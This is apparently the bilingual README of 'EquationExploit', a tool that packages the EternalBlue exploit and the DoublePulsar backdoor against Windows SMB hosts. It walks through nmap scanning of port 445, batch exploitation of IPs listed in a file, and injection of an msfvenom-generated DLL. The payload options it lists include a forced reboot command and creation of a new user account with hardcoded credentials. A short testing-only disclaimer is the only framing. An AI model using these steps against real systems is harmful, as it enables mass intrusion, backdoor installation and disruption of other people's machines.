EquationExploit

Eternalblue Doublepulsar exploit

Disclaimer

This program is only for testing security and you must comply with local laws. Otherwise, please immediately turn off and delete the program.

Usage

java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
Batch use

ip.txt

192.168.0.3

中文README

免责声明

此程序仅用于测试安全性,您必须遵守当地法律。 否则,请立即关闭并删除程序。

扫描目标主机

可借助nmap 扫描445端口开放的主机 nmap 192.168.0-255.0/24 -p 445 --open

用法

start.bat打开即可。

或自己输入:

java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
pause

所有选项都有默认项,回车键即可。

选项 - 选择exploit

注意顺序

Eternalble:安装backdoor

Doublepulsar:执行相关操作

选项 - 批量利用

两个exploit都有这个选项:

input TargetIpAddress or list (Default. The 'list' will use ip.txt):

在这一步除非输入IP地址,否则默认为批量利用:依次测试ip.txt中的ip

内容格式:一行一个ip

192.168.0.2
192.168.0.3

选项 - payloadDllname指定注入目标机目标进程的dll文件

可使用msfvenom生成DLL(CMD可指定需要执行的命令):

Msfvenom –platform Windows -p windows/x64/exec -f dll -o /tmp/exec.dll CMD=calc

dll功能说明

shutdown -r -f -t 00

立即重启计算机 :将显示窗口 标题为"您将要被注销" Windows将在一分钟内关闭。

创建用户(UAC机制导致仅能在管理员权限执行成功)

f4ck
f4ckworld